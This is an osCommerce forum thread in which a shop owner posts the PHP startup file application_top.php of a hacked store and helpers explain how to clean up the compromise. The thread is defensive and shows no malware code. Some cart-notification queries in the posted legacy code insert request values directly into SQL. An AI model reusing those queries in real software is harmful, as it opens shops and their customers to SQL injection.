 $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2008 osCommerce

 Released under the GNU General Public License
*/

// start the timer for the page parse time log
 define('PAGE_PARSE_START_TIME', microtime());

// set the level of error reporting
 error_reporting(E_ALL & ~E_NOTICE);

// check support for register_globals
 if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
   exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
 }

// Set the local configuration parameters - mainly for developers
 if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

// include server parameters
 require('includes/configure.php');

//test comment line


if (strlen(DB_SERVER) < 1) {
   if (is_dir('install')) {
     header('Location: install/index.php');
   }
 }

// define the project version
 define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

// some code to solve compatibility issues
 require(DIR_WS_FUNCTIONS . 'compatibility.php');
// set the type of request (secure or not)
 $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';
// set php_self in the local scope
 if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

 if ($request_type == 'NONSSL') {
   define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);
 } else {
   define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);
 }

// include the list of project filenames
 require(DIR_WS_INCLUDES . 'filenames.php');

// include the list of project database tables
 require(DIR_WS_INCLUDES . 'database_tables.php');

// include the IP Trap
 require(DIR_WS_INCLUDES . 'secret.php');

// customization for the design layout
 define('BOX_WIDTH', 190); // how wide the boxes should be in pixels (default: 125)
define('BOX_WIDTH_RIGHT', 163); // how wide the boxes should be in pixels (default: 125)
// include the database functions
 require(DIR_WS_FUNCTIONS . 'database.php');

// make a connection to the database... now
 tep_db_connect() or die('Unable to connect to database server!');

// set the application parameters
 $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
 while ($configuration = tep_db_fetch_array($configuration_query)) {
   define($configuration['cfgKey'], $configuration['cfgValue']);
 }

// FWR Media Security Pro
if ( defined('FWR_SECURITY_PRO_ON') && FWR_SECURITY_PRO_ON === 'true' ) {
$fwr_security_excludes = array();
if ( defined('FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON') && FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON === 'true' )
$fwr_security_excludes = explode(',', FWR_SECURITY_PRO_FILE_EXCLUSIONS);
if ( !in_array(basename($_SERVER['PHP_SELF']), $fwr_security_excludes) )
include('includes/functions/security.php');
}
if ( function_exists('tep_clean_get__recursive') ) {
// Recursively clean $HTTP_GET_VARS and $_GET
// There is no legitimate reason for these to contain anything but ..
// A-Z a-z 0-9 -(hyphen).(dot)_(underscore) {} space
$HTTP_GET_VARS = tep_clean_get__recursive($HTTP_GET_VARS);
$_GET = tep_clean_get__recursive($_GET);
$_REQUEST = $_GET + $_POST; // $_REQUEST now holds the cleaned $_GET and std $_POST. $_COOKIE has been removed.
fwr_clean_global($_GET); // Change the $GLOBALS value to the cleaned value
}
// END - FWR Media Security Pro


// if gzip_compression is enabled, start to buffer the output
 if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {
   if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {
     if (PHP_VERSION >= '4.0.4') {
       ob_start('ob_gzhandler');
     } else {
       include(DIR_WS_FUNCTIONS . 'gzip_compression.php');
       ob_start();
       ob_implicit_flush();
     }
   } else {
     ini_set('zlib.output_compression_level', GZIP_LEVEL);
   }
 }

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled
 if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {
   if (strlen(getenv('PATH_INFO')) > 1) {
     $GET_array = array();
     $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);
     $vars = explode('/', substr(getenv('PATH_INFO'), 1));
     for ($i=0, $n=sizeof($vars); $i<$n; $i++) {
       if (strpos($vars[$i], '[]')) {
         $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];
       } else {
         $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];
       }
       $i++;
     }

     if (sizeof($GET_array) > 0) {
       while (list($key, $value) = each($GET_array)) {
         $HTTP_GET_VARS[$key] = $value;
       }
     }
   }
 }

// define general functions used application-wide
 require(DIR_WS_FUNCTIONS . 'general.php');
 require(DIR_WS_FUNCTIONS . 'html_output.php');

// set the cookie domain
 $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);
 $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

// include cache functions if enabled
 if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

// include shopping cart class
 require(DIR_WS_CLASSES . 'shopping_cart.php');

// include navigation history class
 require(DIR_WS_CLASSES . 'navigation_history.php');

// check if sessions are supported, otherwise use the php3 compatible session class
 if (!function_exists('session_start')) {
   define('PHP_SESSION_NAME', 'osCsid');
   define('PHP_SESSION_PATH', $cookie_path);
   define('PHP_SESSION_DOMAIN', $cookie_domain);
   define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

   include(DIR_WS_CLASSES . 'sessions.php');
 }

// define how the session functions will be used
 require(DIR_WS_FUNCTIONS . 'sessions.php');

// set the session name and save path
 tep_session_name('osCsid');
 tep_session_save_path(SESSION_WRITE_DIRECTORY);

// set the session cookie parameters
  if (function_exists('session_set_cookie_params')) {
   session_set_cookie_params(0, $cookie_path, $cookie_domain);
 } elseif (function_exists('ini_set')) {
   ini_set('session.cookie_lifetime', '0');
   ini_set('session.cookie_path', $cookie_path);
   ini_set('session.cookie_domain', $cookie_domain);
 }

// set the session ID if it exists
  if (isset($HTTP_POST_VARS[tep_session_name()])) {
    tep_session_id($HTTP_POST_VARS[tep_session_name()]);
  } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {
    tep_session_id($HTTP_GET_VARS[tep_session_name()]);
  }

// start the session
 $session_started = false;
 if (SESSION_FORCE_COOKIE_USE == 'True') {
   tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

   if (isset($HTTP_COOKIE_VARS['cookie_test'])) {
     tep_session_start();
     $session_started = true;
   }
 } elseif (SESSION_BLOCK_SPIDERS == 'True') {
   $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
   $spider_flag = false;

   if (tep_not_null($user_agent)) {
     $spiders = file(DIR_WS_INCLUDES . 'spiders.txt');

     for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {
       if (tep_not_null($spiders[$i])) {
         if (is_integer(strpos($user_agent, trim($spiders[$i])))) {
           $spider_flag = true;
           break;
         }
       }
     }
   }

   if ($spider_flag == false) {
     tep_session_start();
     $session_started = true;
   }
 } else {
   tep_session_start();
   $session_started = true;
 }

 if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {
   extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);
 }

// set SID once, even if empty
 $SID = (defined('SID') ? SID : '');

// verify the ssl_session_id if the feature is enabled
 if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {
   $ssl_session_id = getenv('SSL_SESSION_ID');
   if (!tep_session_is_registered('SSL_SESSION_ID')) {
     $SESSION_SSL_ID = $ssl_session_id;
     tep_session_register('SESSION_SSL_ID');
   }

   if ($SESSION_SSL_ID != $ssl_session_id) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
   }
 }

// verify the browser user agent if the feature is enabled
 if (SESSION_CHECK_USER_AGENT == 'True') {
   $http_user_agent = getenv('HTTP_USER_AGENT');
   if (!tep_session_is_registered('SESSION_USER_AGENT')) {
    $SESSION_USER_AGENT = $http_user_agent;
     tep_session_register('SESSION_USER_AGENT');
   }

   if ($SESSION_USER_AGENT != $http_user_agent) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// verify the IP address if the feature is enabled
 if (SESSION_CHECK_IP_ADDRESS == 'True') {
   $ip_address = tep_get_ip_address();
   if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {
     $SESSION_IP_ADDRESS = $ip_address;
     tep_session_register('SESSION_IP_ADDRESS');
   }

   if ($SESSION_IP_ADDRESS != $ip_address) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// create the shopping cart & fix the cart if necesary
 if (tep_session_is_registered('cart') && is_object($cart)) {
   if (PHP_VERSION < 4) {
     $broken_cart = $cart;
     $cart = new shoppingCart;
     $cart->unserialize($broken_cart);
   }
 } else {
   tep_session_register('cart');
   $cart = new shoppingCart;
 }

// include currencies class and create an instance
 require(DIR_WS_CLASSES . 'currencies.php');
 $currencies = new currencies();

// include the mail classes
 require(DIR_WS_CLASSES . 'mime.php');
 require(DIR_WS_CLASSES . 'email.php');

// set the language
 if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {
   if (!tep_session_is_registered('language')) {
     tep_session_register('language');
     tep_session_register('languages_id');
   }

   include(DIR_WS_CLASSES . 'language.php');
   $lng = new language();

   if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {
     $lng->set_language($HTTP_GET_VARS['language']);
   } else {
     $lng->get_browser_language();
   }

   $language = $lng->language['directory'];
   $languages_id = $lng->language['id'];
 }

// include the language translations
 require(DIR_WS_LANGUAGES . $language . '.php');

 // Ultimate SEO URLs v2.2d
if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) {
  include_once(DIR_WS_CLASSES . 'seo.class.php');
  if ( !is_object($seo_urls) ){
    $seo_urls = new SEO_URL($languages_id);
  }
}


// currency
 if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {
   if (!tep_session_is_registered('currency')) tep_session_register('currency');

   if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {
     $currency = $HTTP_GET_VARS['currency'];
   } else {
     $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;
   }
 }

// navigation history
 if (tep_session_is_registered('navigation')) {
   if (PHP_VERSION < 4) {
     $broken_navigation = $navigation;
     $navigation = new navigationHistory;
     $navigation->unserialize($broken_navigation);
   }
 } else {
   tep_session_register('navigation');
   $navigation = new navigationHistory;
 }
 $navigation->add_current_page();

// Shopping cart actions

 if (isset($HTTP_GET_VARS['action'])) {
// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled
   if ($session_started == false) {
     tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));
   }

   if (DISPLAY_CART == 'true') {
     $goto =  FILENAME_SHOPPING_CART;
     $parameters = array('action', 'cPath', 'products_id', 'pid');
   } else {
     $goto = basename($PHP_SELF);
     if ($HTTP_GET_VARS['action'] == 'buy_now') {
       $parameters = array('action', 'pid', 'products_id');
     } else {
       $parameters = array('action', 'pid');
     }
   }
   switch ($HTTP_GET_VARS['action']) {
     // customer wants to update the product quantity in their shopping cart
     case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {
                               if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {
                                 $cart->remove($HTTP_POST_VARS['products_id'][$i]);
                               } else {
                                 if (PHP_VERSION < 4) {
                                   // if PHP3, make correction for lack of multidimensional array.
                                   reset($HTTP_POST_VARS);
                                   while (list($key, $value) = each($HTTP_POST_VARS)) {
                                     if (is_array($value)) {
                                       while (list($key2, $value2) = each($value)) {
                                         if (ereg ("(.*)\]\[(.*)", $key2, $var)) {
                                           $id2[$var[1]][$var[2]] = $value2;
                                         }
                                       }
                                     }
                                   }
                                   $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';
                                 } else {
                                   $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';
                                 }
                                 $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // customer adds a product from the products page
     case 'add_product' :    if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {
//++++ QT Pro: Begin Changed code
                               $attributes=array();
                               if (isset($HTTP_POST_VARS['attrcomb']) && (preg_match("/^\d{1,10}-\d{1,10}(,\d{1,10}-\d{1,10})*$/",$HTTP_POST_VARS['attrcomb']))) {
                                 $attrlist=explode(',',$HTTP_POST_VARS['attrcomb']);
                                 foreach ($attrlist as $attr) {
                                   list($oid, $oval)=explode('-',$attr);
                                   if (is_numeric($oid) && $oid==(int)$oid && is_numeric($oval) && $oval==(int)$oval)
                                     $attributes[$oid]=$oval;
                                 }
                               }
                               if (isset($HTTP_POST_VARS['id']) && is_array($HTTP_POST_VARS['id'])) {
                                 foreach ($HTTP_POST_VARS['id'] as $key=>$val) {
                                   if (is_numeric($key) && $key==(int)$key && is_numeric($val) && $val==(int)$val)
                                     $attributes=$attributes + $HTTP_POST_VARS['id'];
                                 }
                               }
                               $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $attributes))+1, $attributes);
//++++ QT Pro: End Changed Code
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // performed by the 'buy now' button in product listings and review page
     case 'buy_now' :        if (isset($HTTP_GET_VARS['products_id'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     case 'notify' :         if (tep_session_is_registered('customer_id')) {
                               if (isset($HTTP_GET_VARS['products_id'])) {
                                 $notify = $HTTP_GET_VARS['products_id'];
                               } elseif (isset($HTTP_GET_VARS['notify'])) {
                                 $notify = $HTTP_GET_VARS['notify'];
                               } elseif (isset($HTTP_POST_VARS['notify'])) {
                                 $notify = $HTTP_POST_VARS['notify'];
                               } else {
                                 tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                               }
                               if (!is_array($notify)) $notify = array($notify);
                               for ($i=0, $n=sizeof($notify); $i<$n; $i++) {
                                 $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");
                                 $check = tep_db_fetch_array($check_query);
                                 if ($check['count'] < 1) {
                                   tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");
                                 }
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'notify_remove' :  if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {
                               $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               $check = tep_db_fetch_array($check_query);
                               if ($check['count'] > 0) {
                                 tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'cust_order' :     if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
   }
 }

// include the who's online functions
 require(DIR_WS_FUNCTIONS . 'whos_online.php');
 tep_update_whos_online();

// include the password crypto functions
 require(DIR_WS_FUNCTIONS . 'password_funcs.php');

// include validation functions (right now only email address)
 require(DIR_WS_FUNCTIONS . 'validations.php');

// split-page-results
 require(DIR_WS_CLASSES . 'split_page_results.php');

// infobox
 require(DIR_WS_CLASSES . 'boxes.php');

// auto activate and expire banners
 require(DIR_WS_FUNCTIONS . 'banner.php');
 tep_activate_banners();
 tep_expire_banners();

// auto expire special products
 require(DIR_WS_FUNCTIONS . 'specials.php');
 tep_expire_specials();



// calculate category path
 if (isset($HTTP_GET_VARS['cPath'])) {
   $cPath = $HTTP_GET_VARS['cPath'];
 } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
   $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
 } else {
   $cPath = '';
 }

 if (tep_not_null($cPath)) {
   $cPath_array = tep_parse_category_path($cPath);
   $cPath = implode('_', $cPath_array);
   $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
 } else {
   $current_category_id = 0;
 }

// include the breadcrumb class and start the breadcrumb trail
 require(DIR_WS_CLASSES . 'breadcrumb.php');
 $breadcrumb = new breadcrumb;

 $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
 $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

/*** Begin Header Tags SEO ***/  
// add category names or the manufacturer name to the breadcrumb trail
 if (isset($cPath_array)) {
   for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {
     $categories_query = tep_db_query("select categories_htc_title_tag from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "' LIMIT 1");
     if (tep_db_num_rows($categories_query) > 0) {
       $categories = tep_db_fetch_array($categories_query);
       $breadcrumb->add($categories['categories_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));
     } else {
       break;
     }
   }
 } elseif (isset($_GET['manufacturers_id'])) {
   $manufacturers_query = tep_db_query("select manufacturers_htc_title_tag from " . TABLE_MANUFACTURERS_INFO . " where manufacturers_id = '" . (int)$_GET['manufacturers_id'] . "' AND languages_id = '" . (int)$languages_id . "' LIMIT 1");
   if (tep_db_num_rows($manufacturers_query)) {
     $manufacturers = tep_db_fetch_array($manufacturers_query);
     $breadcrumb->add($manufacturers['manufacturers_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $_GET['manufacturers_id']));
   }
 }

// add the products name to the breadcrumb trail
if (isset($_GET['products_id'])) {
 $products_query = tep_db_query("select pd.products_head_title_tag from " . TABLE_PRODUCTS . " p left join " . TABLE_PRODUCTS_DESCRIPTION . " pd on p.products_id = pd.products_id where p.products_id = '" . (int)$_GET['products_id'] . "' and pd.language_id ='" .  (int)$languages_id . "' LIMIT 1");
 if (tep_db_num_rows($products_query)) {
   $products = tep_db_fetch_array($products_query);
   $breadcrumb->add($products['products_head_title_tag'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $_GET['products_id']));
 }
} 
/*** End Header Tags SEO ***/

// initialize the message stack for output messages
 require(DIR_WS_CLASSES . 'message_stack.php');
 $messageStack = new messageStack;

// set which precautions should be checked
 define('WARN_INSTALL_EXISTENCE', 'true');
 define('WARN_CONFIG_WRITEABLE', 'true');
 define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');
 define('WARN_SESSION_AUTO_START', 'true');
 define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');

if ( (basename($PHP_SELF) != FILENAME_LOGIN) && (basename($PHP_SELF) != FILENAME_LOGOFF) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT_SUCCESS) && (basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN)) {
//$navigation->set_snapshot();
}?>

 

Your help is much appreciated

 

Donal

[germ]

That isn't what's on the server,

 

Read what I asked for again.

[home_field]

That isn't what's on the server,

 

Read what I asked for again.

 

That is the file that i have up on the server..

 

Is it the source code no?

[germ]

That is the file that i have up on the server..

 

Is it the source code no?

Trust me.

 

The file on the server has hack code in it.

 

Read it off the server and post the first 50 or 60 lines.

 

What you posted DOES NOT match what's on the server.

[home_field]

Trust me.

 

The file on the server has hack code in it.

 

Read it off the server and post the first 50 or 60 lines.

 

What you posted DOES NOT match what's on the server.

 

I uploaded (FTP) the file again there and that is whats live a the minute..

 

I checked through file manager and the code matches..

 

Could the hacked code be in another file and directing to application_top.php

[germ]

When you uploaded it again you erased the hack code.

 

I am sending you a PM about other possible hack files I saw.

[home_field]

When you uploaded it again you erased the hack code.

 

I am sending you a PM about other possible hack files I saw.

 

I removed two of them files and it seemed to have done the trick.. figures crossed.

 

I found another install file in a payment module in admin... it looks very dodge i will delete it aswell..

 

Will i check incase there is other instances of these file.?

 

Donal

[germ]

The awful truth is that once security has been compromised every file on the site is guilty until proven innocent by examination of it's contents.

 

There may be other hack files lurking, or the contents of other files may have been altered.

[home_field]

The awful truth is that once security has been compromised every file on the site is guilty until proven innocent by examination of it's contents.

 

There may be other hack files lurking, or the contents of other files may have been altered.

 

I will go through each with a fine tooth cone to make sure no others have be changed..

 

I have installed those security contribution so hopefully i will stay secure..

 

thanks for all your help

donal

[MrPhil]

If you've been hacked, your best recourse may be to erase every PHP file on your site, after saving the contents of the old configure.php files to the side. In fact, erase everything except product image files and any downloadable products. Reinstall the entire osC code set (copy in the files via FTP, not an install), and rebuild the configure.php files from their old data. Reinstall any add-ons you've been using. If your hacked version was 2.2 RC2 or RC2a, your database should be up to date. If you had an older version (2.2 MS2 or earlier, possibly 2.2 RC1), you should compare your database table structure and manually update your database to RC2a's definitions. While you're at it, prepare for the PHP 5.3 your host will eventually move to, by installing the add-on for "deprecated functions". Prepare for MySQL 5 by patching your code: http://www.oscommerce.com/forums/topic/335136-osc-and-mysql-5-1054-errors .

 

You mentioned something about hunting BOMs. Some stupid editors "helpfully" insert a UTF-8 Byte Order Mark into a file when it's edited and it thinks you're in UTF-8 mode. This can cause "headers already sent" messages, but usually from line 1 of a file. They are visible only if your browser is put into non-UTF8 character encoding mode (e.g., Latin-1/ISO-8859-1), and so can be easy to overlook if you normally run in UTF-8 mode. Your browser should have a View > Character Set Encoding option -- try putting it into Latin-1 as you hunt for BOMs, and you'll see any magically pop up. Find an editor (or editor setting) that lets you remove the BOM and save the file without it.

 

Finally, if you were hacked, consider that a hacker may have installed spyware such as password sniffers or keystroke loggers on your PC (the one used to administratively access your site). Do a spyware scan and cleanup on your PC, and then change all your passwords: site access, FTP, admin account, etc.